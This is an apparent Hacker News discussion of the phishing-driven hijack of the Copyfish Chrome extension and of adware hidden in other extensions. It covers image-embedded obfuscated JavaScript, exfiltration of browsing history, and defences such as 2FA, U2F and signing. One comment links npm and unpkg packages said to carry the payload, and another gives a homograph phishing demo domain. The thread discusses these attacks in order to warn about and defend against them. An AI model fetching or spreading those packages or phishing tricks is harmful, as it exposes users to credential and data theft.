Hacker News new | comments | show | ask | jobs | submit login
Our Copyfish extension was stolen and adware-infested (a9t9.com)
329 points by timr 82 days ago | hide | past | web | 204 comments | favorite



I guess this is as good a place as any to post that I noticed something similar had happened to [User-Agent Switcher for Google Chrome](https://chrome.google.com/webstore/detail/user-agent-switche...) and [Block Site](https://chrome.google.com/webstore/detail/block-site/eiimnmi...). The "report abuse" link on the page is useless. The former is very insidious in that it actually hides the malware in a .jpg file that appears benign at first (promo.jpg for anyone who wants to analyze) but when loaded in a canvas element and decoded in some manner yields js that goes on to send all the user's http requests to some domain while also injecting ads and redirecting to affiliate links.


> it actually hides the malware in a .jpg file that appears benign at first (promo.jpg for anyone who wants to analyze) but when loaded in a canvas element and decoded in some manner

I am guessing the extensions had a "content_security_policy" key in its manifest[1], with a 'unsafe-eval' CSP directive in its value?

Any extension which declare such CSP directive in its manifest should be presumed malicious until further thorough investigation proves otherwise.

The 'unsafe-eval' in a manifest is essentially the ability for an extension to execute arbitrary code in the extension context which can't be code-reviewed by reading the source files.

EDIT:

"User-Agent Switcher for Google Chrome" confirmed to have a 'unsafe-eval' in its manifest.

"Block site" does not declare 'unsafe-eval' in its manifest. It does however add many "script-src" directives in its manifest, including one for ".wips.com", which means the extension can pull javascript resources not bundled with the extension from its own web site (hence outside of the Chrome store review process if any), and thus the behavior of the extension is subject to change at any time as far as its permissions allow.

So I guess the suspicion should be extended to any extension declaring a "content_security_policy" key in its manifest.

===

[1] https://developer.mozilla.org/en-US/Add-ons/WebExtensions/ma...


So how does unsafe-eval and loading scripts dynamically pass any sort of "google security scan"?

It would seem obvious that the moment a script tries to load arbitrary code outside of the package, it should fail.


Because unfortunately many, many libraries and templating engines rely on evaling code.

Generated code is code that's outside of the package.

There are also a few (keyword: FEW) valid reasons for using eval in situations where it's beneficial to pull updates and modules from a known and trusted location.

In those cases though, if you're not signing server side and validating signatures in the extension with a pre-shared cert, you've still got problems (single MITM attack can compromise your extension going forward).

Long story short, eval is still a very useful feature. It needs to be used properly, and it should be used rarely, but it's incredibly powerful, and lots of things you don't really think about suddenly stop working if it goes away.


> Long story short, eval is still a very useful feature.

And yet this is Mozilla's stance regarding extensions pulling code from outside the extension's own package[1]:

> extensions with 'unsafe-eval', 'unsafe-inline', remote script, or remote sources in their CSP are not allowed for extensions listed on addons.mozilla.org due to major security issues.

This is the sane stance in my opinion, with the best interests of users at heart.

I would like to be shown an actual, real case of why eval() would be impossible to avoid for an extension, not just a theorized one with no real sensible and convincing example. As much as I try, I can't come up with any such scenario.

[1] https://developer.mozilla.org/en-US/Add-ons/WebExtensions/ma...


You're really unable to come up with a single example of why treating data as code isn't useful?

I mostly agree with you, eval is dangerous and often improperly used, but it's ALSO an incredible tool.

The complete opposite of your argument is languages that are homoiconic(https://en.wikipedia.org/wiki/Homoiconicity): They're built in a way that explicitly allows manipulation, even of the language itself as a FEATURE.

They include languages like Lisp/Clojure/Julia.

Worse, many of the ways to "work" around the lack of eval just reduce the attack surface, or make the attack considerably less likely (obfuscation not security!).

Simple case: You need to apply certain policies to certain sites, those policies vary based on the browser in use, the country of origin of the user, and the country the site is hosted in.

The way that those policies vary... ALSO varies. As new legislation is passed, or corporate policies change, or certain countries become more or less stable.

A (completely valid) way to solve this problem would be to send both a policy engine and a policy set to the extension. The policy engine is eval'd and runs the policy set.

That allows real-time updates to the deployed extension's ability to parse new policies. Not just different data in the policies, mind you, but actual new policy capabilities.

Do you have to use eval? Nope, sure don't. You can generate a custom ebnf (hell, why not just use the ebnf for ecmascript), write you own freaking engine, and run it. All without eval. But you're still just running eval. You just get to name it nicely to something else, introduce an incredible amount of overhead to recreate a feature someone has already provided, and generally get less performant results.

Or, you can just fucking sign the payload with a pinned cert and verify on the client, and get the same guarantees for security you have with HTTPS to begin with.


"Treating code and data" doesn't specifically require eval. Lisp macros avoid eval. Dynamic extensions to a running Lisp program don't require eval, but rather load.


Sure, but you're still taking data from outside of your original package scope and running it or allowing it to be run later.

That's just useful. Javascript eval gets a bad rap (entirely in my own opinion) because

1. It's the de-facto language for the web, which both drastically increases the number of inexperienced developers, as well as the total attack surface.

2. Again, as a scripting language for browsers, parsing untrusted user input is a common need. Eval filled the need for parsing, but not the need for trust.

You can absolutely use eval in entirely safe ways. Most people don't, and doing so (especially in JS) is hard. That's because JS has made establishing trust hard. Juuuuust recently, with the introduction of some of the webcrypto work, and the rapid rise of ubiquitous https are we really getting to the point where doing so is really feasible at all.


Indeed they do. I can think much of the NPM ecosystem which assumes (incorrectly) that packages are unique, stable, and good. That whole situation a while back showed that not to be the case.

I'd be OK with grabbing code elsewhere, as long as I could guarantee that it would never change. Primarily, immutability. I'm thinking of something like an IPFS repo which is "elsewhere", but still very much crawl-able, scannable for bad stuff (aside turing issues...), and can be shown to reproduce stuff if it is broken.

Also, using an immutable self-certifying system would also solve the second point, regarding the single MITM. The trust would be with the file/package, and not some ephemeral cert (whos trust is brokered from above).


>I'd be OK with grabbing code elsewhere, as long as I could guarantee that it would never change.

But there are lots of times when the final result is much more valuable when the code CAN change.

You just have to have trust.

1. Trust that the folks who can change the code aren't malicious.

2. Trust that the code you think you're running is really the code you're running.

Neither of those things are really too much of a stretch. And the services and capabilities they allow are very, very nice.

Hell, statistically speaking... we're both typing these comments in Google Chrome, a browser that auto-updates itself all the time.

but 1. we trust that Google won't suddenly become malicious and 2. we trust the mechanisms in place (https, cert pinning) to ensure the update is really the update Google sent.

In fact, this whole article actually boils down to a breakdown of trust: Turns out random extension devs aren't as trustworthy as we might like. They make mistakes and there's no safety net.


If it can't change, then what's the point of grabbing something elsewhere instead of just embedding it in the addon?


I am mortified. I had this extension installed for 2 years... What info did they get and what can they do to me? Please help... (I uninstalled it, talking about User-Agent Switcher)


I had the same concern when I found out. I narrowed it to see that it was probably only within the last ~5 months that it was updated to include the badware. I don't have the skills to decode it fully (since it was obfuscated quite heavily) but I know at the very least that it sends browsing history and injects ads.

I'm not sure if extensions also have the capability to capture the https body info, but I erred on the safe side and also changed passwords.


Are you sure it's "User-Agent Switcher for Google Chrome", not just "User-Agent Switcher"? See my other comment that refers to the difference.


That is some fine detective work there, Lieutenant! :) What tipped you off in the first place to the malware in User-Agent Switcher?


The odd post requests I noticed to uaswitcher.org in wireshark while I was trying to create a packet capture. I saw that it contained my browsing history urls in double encoded base64 format. Interestingly it appears the extension was infected ~4 years back, taken down, and somehow later re-added, only to be reinfested with malware within the last few months. Suffice to say, I am now paranoid and have audited all my extensions, tossed out everything with obfuscated js, and run all my extensions in developer mode so I can be sure they never update without my consent.


I don't use browser extensions at all because they are often made by unknown developers and I cannot trust them.


I always thought it was strange that Google bothered adding so many XSS prevention measures to Chrome when they also happily give UXSS abilities to extension developers, complete with the veneer of trust provided by the Chrome web store.


> veneer of trust provided by the Chrome web store

Seriously? Who trusts the Chrome store or the Android store for that matter? If you've ever once submitted an app and seen how loose the security is, I can't see how you'd have any faith in their system.


You're viscously agreeing here. "Veneer" means a very thin layer of pretty material on top of cheaper material -- in this context the comment was saying that the trust afforded to Google is skin-deep and is probably unjustified.


Ahh you're quite right. Apologies, not enough coffee yet.


and if an extension is not downright malignand, they are often slow.


> urls in double encoded base64 format

I've seen that somewhere else; is it just for obfuscation? Or is there some other reason for it?


From what I've seen online a lot of these adware extensions do something similar. To me it doesn't make sense as an obfuscation method since anyone capable of capturing traces of network activity (or using chrome dev tools to do the equivalent) can probably recognize a base64 encoding and can just run the decoder a second time.

Maybe it might fool some automated analyzers though.


I've definitely seen naive analyzers just do something like:

-Input string

-If string is Base64 encoded

--Run base64decode(string)

-Output new string

With no recursion for an iterated check of any sort of encoding.


Beware: I also have a User Agent Switcher extension installed and was surprised to hear about this malware. Looks like the one I've been using safely is called "User-Agent Switcher" (https://chrome.google.com/webstore/detail/user-agent-switche...) and is only 23KB (whereas the "... for Google Chrome" is at 350KB).


For reference, on Windows the Chrome extensions are stored in a path ~similar~ to this one I have:

C:\Users\<login.name>\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkmofgnohbedopheiphabfhfjgkhfcgf\2.0_0

"lkmofgnohbedopheiphabfhfjgkhfcgf" is the identifier for the user-agent extension I've been using for a while, and looking at the code, it's very straightforward and not spying on anything. It has not been updated since 2013 (and the website listed for the dev, www.toolshack.com, is not online), so I'm guessing a lot of users just go with other extensions that have received updates.

BTW, Google itself offers a similar extension at 120KB called "User-Agent Switcher for Chrome" (not "... for Google Chrome") here: https://chrome.google.com/webstore/detail/user-agent-switche...


Damn! I was using this all along!. Removed it immediately and checked the chrome store for an alternative, there's one from Google itself.


You're referring to this one right?

https://chrome.google.com/webstore/detail/user-agent-switche...

Is there any way to confirm that this is actually from google though, and not just some 3rd party who chose their publisher name as "google.com"? Most official google extensions have a "by google" badge in the right hand column whereas this one lacks it.


It's interesting, if you go to the support tab and follow the link to the maker's support website, you end up on https://spoofer-extension.appspot.com/ The contact page there links to "Glenn Willson" as the author - and their G+ page has a link to The User-Agent Switcher Has A New Owner: Google! http://www.glennwilson.info/2017/02/the-user-agent-switcher-...

Now, is that trustworthy or not? Good question.


Search for an official Google Chrome extension (such as Chrome Remote Desktop). You'll see a 'By Google' logo (https://chrome.google.com/webstore/category/collection/by_go...) as well as an 'offered by google.com'.

This just has the 'offered by google.com'. I would have assumed a 'By Google' logo would have been added after acquisition?


If you go to the listing of all Google extensions (the URL you linked) and open the "Chrome Sign Builder" Extension, go to Related -> "More from this Developer" you will find the User-Agent Switcher for Chrome. So it does seem legit.


Well, the LinkedIn checks out too: https://www.linkedin.com/in/wilsong

Of course, forgeable as well.

I've sent an email to his anonymized domain registrant contact to see if he can do anything about his malicious competitor.


Wow, I went to try and add a 1-star review to each to warn users (since both have extremely high ratings) and you need to install the malware-ridden extension to leave a review.

So we have a web store that that average Chrome users think is "safe," especially when apps have high review scores, and no meaningful ability to report malware to Google or to the users. Nice.


There is literally a 'Report Abuse' button about two inches below the download button. That's what you use in this case. Being able to leave a review of something you haven't tried would just be silly.


Are there any known problems with Random User Agent?


Chrome's security policy is surprisingly poor and is the reason why I stay away from most extensions. "Read data from all websites" is like root on the phone. It should be allowed only via deliberate, explicit user action. While this will be an interesting UX challenge, defaulting to domain-specific permissions is the sane thing to do in this age.

Case in point, I don't care about a readability or bookmarking plugin reading a news link, but it shouldn't read my bank page.


I think more granular permissions, not domain-specific permissions, are the solution. Domain-specific permissions destroy the illusion that the extension is part of the browser, without restricting access as far as it should be.

For example, I made an extension that, upon a certain keyboard shortcut, saves the current page in a specific bookmarks folder. Currently Chrome's permissions model completely fails here, you need to request full access to all user data, everywhere, indefinitely.

Which would be better, (a) granting full indefinite access to the domain you're bookmarking most of the time you bookmark something, or (b) giving the extension permission only to see the current tab's URL and title, and to edit one specific bookmarks folder, and only during a keyboard shortcut's callback?

The granularity solution to your scenario would be to tie page-reading permissions to your triggering the extension, and have them removed with code execution end. So, now you don't need to worry about sensitive information that shows up on other domains, or your bank deciding to use a subdomain, or that one bank blog post that you actually do want it to see.


Isn't this what the "activeTab" permission is for (combined with a shortcut to trigger the extensions pageAction)?


There's a good flag to make "Read data from all websites" more reasonable.

chrome://flags/#extension-active-script-permission

It requires a "deliberate, explicit user action" to run the extension on the page each time even if it asks for that permission. And if you really do want an extension enabled 24/7 (such as vimium), then you can select a check box in the extensions page which allows the extension to run without specifically enabling it each time.


More or less why I run a fairly minimal set of extensions. I was looking for a bulk downlowned about a week ago, and the only ones I found requested "Read data from all websites", which is a lot of trust to put in something I have limited ability to test/know if it is malicious.

Side note: Chrome appears to have moved Extensions out of Settings since I last looked, and the "search settings" bar doesn't bring it up either. Took me a few minutes to find how to get to them.


> I was looking for a bulk downlowned about a week ago, and the only ones I found requested "Read data from all websites", which is a lot of trust to put in something I have limited ability to test/know if it is malicious.

AIUI that's a consequence of the Chrome extension security model. How could a bulk-downloader extension download files from arbitrary web sites without "Read[ing] data from all websites"?

Compare that to Firefox's model (at least, the old XUL model), where every extension essentially runs as the Firefox equivalent of "root".

But by making nearly every extension sound evil, even the ones that aren't, users get used to accepting every permission request, or not installing any extensions at all.

IMO the danger is worse with Chrome. At least with Firefox, you know that every extension can potentially be malicious. With Chrome, what happens is, you install an extension that has nice-sounding permissions. Then 3 months later, it gets sold to an ad/malware company, they push out a new version that reports every URL you visit to their server, and you see a popup saying that some extension needs more permissions. Maybe you notice it, maybe you think nothing of it--or maybe the browser window steals focus while you're typing and the OK button gets pressed without your even realizing it.


> AIUI that's a consequence of the Chrome extension security model. How could a bulk-downloader extension download files from arbitrary web sites without "Read[ing] data from all websites"?

What I was hoping for was something along the lines of "<Download Extension> wants to access this page" (similar to the notification when a website tries to access your location) upon use. I've no idea if that's possible or not in the Chrome security model.


I don't think it currently is. I guess that would work, if you didn't mind a lot of popups every time you visit another web page... :)


"Chrome's security policy is surprisingly poor and is the reason why I stay away from most extensions. "Read data from all websites" is like root on the phone. It should be allowed only via deliberate, explicit user action."

What we really, really need is the ability to jail (and tie to a different IP) a browser instance.

I want this so much that I am somewhat seriously considering learning the syntax of the vmware fusion command line tool so that I can quickly fire up a browser VM with just a command (and revert state to "clean" snapshot, etc.).

The problem, of course, is that this use-case is so compelling that in a short amount of time I would have 5 or 6 browser VMs running and now I am running out of memory ... it's silly to fire up an entire virtual machine just to run the browser.

However, the existing sandbox measures are not nearly enough. I want to do my banking from a different IP than I use google services from. Every day I want to wipe that OS to clean state and start over.

This is not an easy configuration. Even with an OS (FreeBSD, Solaris) that has jail it's not simple to locally interact with a GUI tool on your existing desktop that is actually in its own jail ...


Isn't installing an extension a "deliberate, explicit user action"?


> “Click here to read more details” the email said. The click opened the “Google” password dialog, and the unlucky team member entered the password for our developer account. This looked all legit to the team member, so we did not notice the pishing attack as such at this point. Pishing for Chrome extensions was simply not on our radar screen.

First, it is excellent that you disclosed the issue.

Second, based upon the quoted text you really aren't accepting responsibility for having been phished. The team member wasn't "unlucky." Your "radar" shouldn't trick you into thinking you won't be attacked.


While I normally agree, I think it's important that they referred to the specific person without using blaming language. The team failed and screwed up because they had bad policies with their account. The individual team member who was holding the keys when the screw-up happened? Unlucky.

Fix the process, not the people.

It's good that they're not throwing the poor person under the bus.


I really wasn't calling to "fix the person."

I agree with you. The email makes the situation appear as a process issue. Based upon the disclosure text, it seems quite possible the person wouldn't normally have clicked on an email text, but did so here based upon process.

The disclosure displayed the attitude that they shouldn't have expected to get phished. It's 2017. Lots of people get phished.

It's pretty straightforward to never click links that arrive in emails, to never enter passwords into webpages that open on their own.

Of course there are technical ways to mitigate this specific attack, but it is more important not to excuse poor Internet hygiene after the fact.


Stating what happened is not blaming language.

Characterizing the act as "unlucky" is excusing language, just as bad as blaming language.

Assigning an error to mystical forces is unhelpful.

Simply stating that the person entered the password into a phishing site is not blaming language, it is factual.


I would kindly ask that the person who has never made a mistake throw the first stone.


I'm with you, this entire thread has brought out the captain hindsight in everyone.


I don't think more policies will make a better place. One of the team member screw up and stuff like this happen. I am questioning his security education to have been phished so easily.


It's counter intuitive. I bet you $5 that if I target you, and you're not expecting it, I can phish you. I've seen this happen in the field, and it doesn't have much to do with education. Relax for an instant and I have you.

The only real defense is to glance at the url bar every time you're about to enter your password. And even I find myself not doing that 100% of the time. It's a numbers game.

A policy of popping up a popup "glance at url bar" every time you copy your password from your password manager (which you're using, right?) would go a long way.


>> The only real defense is to glance at the url bar every time you're about to enter your password

With Google specifically, the worst part is you really do have to look at the URL every single time you go to enter your password. And by that I mean that if you land on the login page, verify the URL, enter your password, submit, and get the error page saying you got the password wrong... you must check the URL again before re-entering your password.

Why? Because Google's login, by design - and repeatedly defended by them as being "acceptable" - allows redirecting off Google's properties after login. So hackers send you to the real Google login page, with a post-login redirect to a fake but perfect copy of the "wrong password, try again" page, where they then capture the passwords of people who mindlessly re-enter their password without double checking the URL a second time.

Most importantly, 2FA does not help you here. You'll enter a currently valid 2FA code on the hacker's site, and they will immediately use that code to actually log in to your account. Before you realize what is happening, you are already locked out of your account - new password, 2FA stripped or replaced, security questions changed, and all pre-existing sessions/devices wiped.


U2F is a second factor which can't be easily phished. If you are using a service which supports U2F and care a minimum about being secure, enabling it is the least you should do.


Physical keys would solve the problem of redirecting to a fake page (and maybe they would make 3-rd party auth protocols like OAuth or Github login unnecessary).


U2F physical keys specifically. Physical keys that generate OTPs would not protect you.


Pretty sure Google and other sites will do another 2FA challenge when you try to remove or change the 2FA challenge.


Most do not, and even Google doesn't. I just verified on my account. You only need to provide your password to access account settings. Completely stripping all two-factor authentication requires no additional 2FA code.


The phisher just shows you a "password incorrect" message on the first attempt. Assuming you made some typing mistake, you enter your password and 2FA again...


> The only real defense is to glance at the url bar every time you're about to enter your password.

With i18n not even that: https://www.theguardian.com/technology/2017/apr/19/phishing-...

Benign POC: https://www.xn--80ak6aa92e.com/ (open it and it'll look like a normal "l" in the url box)


Browser shows https://www.xn--80ak6aa92e.com to me, Chrome on Android. What browser are you using that shows non-ascii with .com?


Firefox for android at least shows it as Unicode


I activated it so it would display the punycode. Every major browser up to few months ago would show it as "apple", not sure now. But we know many people cannot just upgrade their browsers, so there must be still many vulnerable browsers out there.


Firefox on OSX shows it appearing as "www.apple.com"


Same, FF54.0 on Ubuntu 17.04.


Latest Chrome and Safari shows that as https://www.xn--80ak6aa92e.com, no puny code


Lastpass will tell you whether it recognizes the site when you go to fill in the password (yes, I use it despite the scary stuff, I know I probably should switch to OnePassword).

Do other password managers not do that?

Just curious, not trying to engage the bigger question of whether getting phished is the user's fault.


One password has similar behaviour as well as verifying the integrity of the browser[1]. It's not perfect, I'm sure a malicious extension would be unimpeded, but these little features all added up and eventually made me switch.

[1] https://support.1password.com/code-signature/


I use KeepassX, mostly because it's small and nearly impossible to attack. But I understand the desire for convenience, and as you say, there are some advantages to other managers.


No, not that I've seen. lastpass has issues, but it also has some pretty advanced stuff.


Take a look at lesspass


I use iCloud keychain. Safari autofills passwords only if the URL matches. If the password doesn't autofill, I know something odd is going on. Makes it trivial to recognise phishing sites like the one from the linked blog post.


That's a good habit, but a good tool to help you avoid getting phished is https://support.google.com/a/answer/6197508?hl=en

It alerts if you enter your google password anywhere but the real google sign in page.


Ah, the delightful irony. Install a chrome extension to warn you if you get owned by a chrome extension.


That seems like something that should be part of Chrome once you login, not an optional extension.


An email from Google with a bit.ly link? Hell no, I hope I won't fell from it in whatever situation.

I agree that any defense is far from being perfect, but IT professionals shouldn't fell for an unsofiscated attack like this even if you are no working in security. I am not even talking about a web developer.


And you would be wrong about that. They do. All the time. Spear phishing is still the most effective way for foreign nationals to breach US companies.

Now, there are two ways to deal with the situation. Demonize, or accept. The demonize/blame approach doesn't work.


> An email from Google with a bit.ly link?

The article clearly explains that "the bitly link was not directly visible in the phishing email, as it was an HTML-email."


Disabling HTML e-mails does not sound particularly unreasonable. There’s little additional benefit from them but a whole host of possible issues, least of all that suddenly your e-mail client has to deal with properly parsing HTML and you have to decide whether or not to load remote images and potentially execute JavaScript.


I've never read my email in HTML, mostly for security reasons such as this incident. For the rare occasion where an email doesn't render correctly, Thunderbird's "Show HTML" button works a charm.

Have I been able to convince a single customer (I run a computer services business) or friend to follow my lead? Nope, not a single one.


I have no idea why your post was downvoted. Your post is clearly correct.


That too can be fooled. Much better to login to your relevant account by manually opening a new tab and navigating to it. In this case one they saw no link and call to action on their Google developer's website they should realize something was a foot.


Mmm, maybe. I'm certainly not immune to being fooled. I am careful, however. I roll over and check any link in an email before I click it, and I know when I am or am not authenticated into one of my google accounts. It's all too easy, though, to make a mistake like this when you're in a hurry or don't give something enough thought. The email was very good but after reading it a couple of times the language strikes me as not _quite_ right, especially the "unless you fix it" part at the end. Perhaps the key insight is that you have to assume going in that any email you get like this is fake, and then prove otherwise.


> The only real defense is to glance at the url bar every time you're about to enter your password.

No. FIDO hardware 2fa works fine for this.


In this particular case, though, there were enough warning signs that I wouldn't want to run code by anyone who wouldn't notice them on my machine. The email was clearly not professionally written or machine-generated (note the comma inside the quotation marks around the app name; the oblique "fix the issue" doesn't seem like the right expression to match "did not comply with our program policies"), the ID is clearly non-random (a cluster of keys on the left-hand side of a QWERTY keyboard interspersed with a cluster of keys on the right-hand side, as you would get if you mashed keys randomly) and then there's of course the URL shortener link.


As someone who's been phished even though I've written article s on phishing in the past, all it takes is a moment of weakness.

In my case everything looked normal at a glance. 2FA saved me but if they'd had asked for 2FA I wouldn't have noticed.

https://blog.greggman.com/blog/getting-phished/

Other people getting phished

https://www.exploratorium.edu/blogs/tangents/we-got-phished-...


A simple policy to add would be 2-factor authentication, no single shared developer account, and (on Google's side), both another security challenge (2FA) and e-mail notification to both a primary and recovery e-mail address when an extension is moved. Pretty sure Google also raises a question when logging in from a new device, e.g. from Russia, or when certain information is changed. (I know Facebook did at least).



Incorrect. They literally declared "we were phished", in plain words, describing how they were phished and the resulting attack. To say this does not "accept responsibility" is bullshit. You don't get to light the torches and grab the pitchforks to go chase some stranger who exposed you to vulnerability. They are human, they failed, and they're dealing it with professionally.

I'm assuming from your tone of "I demand his head" that you were running the compromised extension, and wish to extract your pound of flesh from the person who compromised you. (EDIT: If not, what's your beef with them? Are you a competitor? Please explain!) This, too, is wrong. And here's why we don't play the blame game when it comes to human failures:

You chose to run a Chrome extension, from an untrusted source, with only machine automation vetting its contents and auto-update ensuring that you get the latest attack. Of course you got compromised. What else did you expect? How could you place ultimate trust for all content in your browser in the hands of an OCR extension?! What on earth could compel you to accept such a ridiculous risk in exchange for this?

Everyone's human, you included. They clearly stated and accepted responsibility for the incident. Now you need to stand up and accept responsibility for running unvetted code in your browser. (EDIT: Yes, it's machine-vetted. How's that working out for you?)

There's more than enough blame to ensure you get an equal portion. Being human is bad enough without people coming to destroy you because they'd rather not confront their own failures of judgement. Get over your immature desire to get your vengeance for being compromised and build a better approach to your own personal security.


Accepting responsibility for being a victim of phishing? That could happen to the best of us.


And it has. Part of my infosec career was spent phishing devs. Everyone scoffs at it until it happens to them. It's quite effective.


Likewise. I just hate this attitude of "they should nhave known better".


They should have known better - not to click on a link in an email. This is absolutely basic.


I rely on my password manager: if it isn't filling in the password automatically, something is suspect. I wonder if I'm the only one who does this.


I used to do that till lastpass had several vulns [1] in which passwords to all sites can be gotten by a malicious page or extension.

If you use a password manager that auto fills in the paswords, it is open to an attack by a site or program that can fool it into thinking you have visited the site.

Any malicious extension such as the one compromised her, has a good chance of being able to drain all your passwords. You are probably safer, even with phishing threats, to paste it in from another program each time.

[1] http://thehackernews.com/2016/07/lastpass-password-manager.h...


I am aware of that bug. However, Google wants to replace lastpass with Chrome sync, so no surprise that their employees are attacking it. Hopefully that made it better.

I doubt even pasting it in is completely secure.


Given it's a team account might have made usage a bit more complicated, but this sounds like something 2FA would have prevented, as even with the passsword the hackers wouldn't have been able to login.


I find it strange the team member clicked on the link. For such high value accounts, always use google or type in the URL.

Why would you click?


And worst of all, it was a bit.ly link they clicked.


Can u paste this mail here ?


The password login system is seriously flawed. I think people and websites should switch to physical keys. They are also easier to use because you don't have to remember complicated passwords.


Looks like they are using unpkg.com and npm to distribute the badware:

https://unpkg.com/copyfish-npm-2-8-5@1.0.1501416918/

https://www.npmjs.com/package/copyfish-npm-2-8-5

I reached out to both services to have it shut down. Hopefully that will at least kill it temporarily.


Unpkg has a blacklist, so you can put up a PR if you know the package IDs.

https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b9...

A similar thing happened with another Chrome extension Social Fixer about a month ago.

EDIT: It's already been blocked, nice work @mjackson

https://github.com/unpkg/unpkg-website/commit/7d4a4ba4958c16...


A similar attack happened on another Chrome extension last month (Social Fixer) with over 190k installs.

In fact, judging by the exploit code, I would guess the same author, as the Social Fixer attack had a very similar hashed package on Unpkg as well.

In that scenario the author also didn't have 2FA enabled: https://www.facebook.com/socialfixer/posts/10155117415829342

I feel like Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.


> Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.

Best comment here


Which would allow real world identity to be discovered, in the event of malware is there a possibility of prosecution eg for something related to recklessly causing damage (through inaction/action)?


This is why it is important to cryptographically sign releases. Browsers are a huge problem with this.

All of the software I use is signed at some point in the chain (be it by the actual author or by the package manager, who'd better be verifying signatures if they're available, otherwise at least not blindly updating), _except for my browser extensions_. Most of it is also _reproducible_! I can get around this for some things---I use GNU Guix in addition to Debian, and they package some extensions. I need to start using them.

Of course, the signature should really come from the actual author, not the package maintainer for a particular distro; there's room for error. In the case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would notice. Git commit and tag signing is an easy way to do this if you don't separately sign releases; package maintainers should be building from source.

In the case of Copyfish: if the browser validated signatures from the authors, then this would have been thwarted.

(Maybe there is some code signing protections in place? I'm not an extension developer for either Chromium or Firefox; please let me know if something does exist!)


My understanding is that Chrome extensions are indeed signed and you can't upload updates without signing the new package with the same key, so presumably the attacker had access to the private key after phishing the Google password.

Perhaps it was stored somewhere accessible by that account? Or accidentally packaged with the extension itself? If that were the case the spear phishing attack would make sense: someone scraping the Chrome store for extensions that contain a key file, then phishing their developer account credentials would be more efficient than phishing credentials without knowing beforehand whether you'd be able to get the private key and update the extension.

https://developer.chrome.com/extensions/packaging


Thanks.

What's concerning to me is the section entitled "Uploading a previously packaged extension to the Chrome Web Store", which asks the user to place the private key into the package's root and include it in a zip. First: why? Why upload the private key? That leaks it to Google and on top of that stores it in multiple places; the user could forget to delete the zip (and do so securely), for example. And the private key in the root is probably a copy, so that has to be shreded too.

For updating the package, you select the project root as well. If you didn't remove your private key before doing so, I'm assuming you'd be releasing your key?


This is the second extension that I use on chrome that has been hijacked.

The first was live http headers [0]

I have never had this experience on Firefox.

Is it simply a matter of Chrome being a bigger target?

[0] https://www.webmasterworld.com/webmaster/4829365.htm


Mozilla review every update. It means it take much longer to get releases out, sometimes months, but will avoid situations like this.


The Great Suspender Chrome extension was also phished

https://github.com/deanoemcke/thegreatsuspender/issues/512


Typewriter sounds , Twitch window which always on top , one of the Youtube UI upgrade extension, but in this case author simply sell extensions to malicious company


but apparently non-maliciously


What do you mean?

I thought the attacker stole the account maliciously, but hadn't quite gotten around to inserting the malware by the time it was taken back.


The live http headers hacking was quite embarrassing for myself personally.

I had strong suspicions that a certain webhost a new client of mine utilized was both prone to attack, and not very forthcoming when past attacks had occurred.

So when I loaded their own website one day and found it full of ads for russian pornography... I confirmed my own bias that the webhost had been hacked... deleted the account, and moved everything over to AWS.

Changed all the passwords, freaked out a bit, etc...

Then I realized that it was just the extension I was running that injected those ads... d'oh!


The somewhat obfuscated JS downloaded from unpkg.com has what appears to be a Google Analytics ID in it: UA-103045553-1. I'm not sure if that can help trace the origin.


It's a bad weekend for Chrome Extensions, it seems.

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20pre...


Good reminder that you should never be in the mindset of "expecting" a phish from any source - trust is how they get you. Also, if a message was really urgent, you wouldn't have to click-through to see it.


I think I'm misreading your comment, but the best defense against phishing is to always be expecting a phishing attack from every source. Every time you're about to paste your password, glance at the url bar.


I think you're both right - they way I read their comment was more like "if you expect a phishing attack from certain sources, this implies you're not on the defensive against attacks which aren't from those sources".


Password managers with browser extensions are a good fix for this too. If you're used to entering your password only through the extension, not being able to do that on a login screen would be a big warning sign. Admittedly, these extensions have had some vulnerabilities in the past, but phishing is simply a bigger problem for the vast majority of users.

Obviously, for sites that support U2F (like Google), getting a YubiKey or any other U2F-compatible key would be the best protection against this.


Semi-relevant link from Bruce Schneier on the subject and that he did not design password safe with a browser extension in mind. https://www.schneier.com/blog/archives/2014/09/security_of_p.... The android version implements a keyboard replacement rather than integrate though not as easy to use is still mostly usable.


I read it as, “you should never be in the mindset of ‘expecting’ a phish from any [specific] source.”

I think OP agrees with you.


> Every time you're about to paste your password, glance at the url bar.

Actually - I disagree with this. You can no longer "glance" at the url bar to determine if you are on the right domain due to Unicode chars if you clicked a link.

The only safe way is to type the url yourself into the browser.

If it is a long link - then at least typing the base domain, and pasting the "rest" is probably safe?


I use 1Password to autofill my passwords, which it won't do if the domain doesn't match, which should also work.


This actually isn't true. A website like https://www.xn--80ak6aa92e.com/ won't show up as apple.com. Browsers don't allow Unicode rendering in the URL bar.

Maybe IE is affected though. I haven't tested every browser. But it's a known security concern.


Disable IDN and you will be safe from those. If you're not going to use non-ASCII domain names, you won't miss much.


It shows up as www.apple.com on Firefox 54.0.1 (latest, up-to-date) on OSX.


Just tried - same (54.0.1) FF version on Android DOES show apple.com (Chrome and Yandex do not).


about:config, set network.standard-url.punycode-host to true


Sorry to tell you, does show up as apple.com in my browser. Chrome 52.0.2743.82-1 on Arch x86_64.


That version of Chrome is over a year old.


The IDN vulnerability was fixed by Google in Chrome 58.

https://arstechnica.co.uk/information-technology/2017/04/chr... https://bugs.chromium.org/p/chromium/issues/detail?id=683314

Why have you got such an old version of Chrome?


Thank you. That gives me a strong reason to update.

To answer your question, (1) it's pretty arduous to install Chrome from the AUR, and (2) I am wary of Google removing useful functionality from Chrome.


>Also, if a message was really urgent, you wouldn't have to click-through to see it.

i don't get that logic. what's the difference between

    Your adwords account was suspended due to suspected click fraud. [bunch of made up plausible reasons]. you may appeal by going to your adwords control panel [phising link here]
and

    Your adwords account was suspended. click here to see why [phising link here].
in both cases you'd be pretty tempted to click the link.


Spear phishing is remarkably effective, even against tech-savvy people. One of the most alarming aspects is that we've become trained to click links in emails as soon as we see some trustworthy indication, be it something we were expecting, a spoofed sender or copying Google's layout, further re-enforced by an accurate login page clone.

I think the best defence here is to condition ourselves out of this behaviour. If you receive a link in an email, don't click it - view the source or paste it into a text document and examine it. And if you aren't expecting an email, such as Google emailing out of the blue, go to the known-trusted site and see if there's any pending notifications.

Seems we need to stop trusting email.


I've gotten this phishing e-mail 3 times over the past month or so. The first time I almost fell for it.

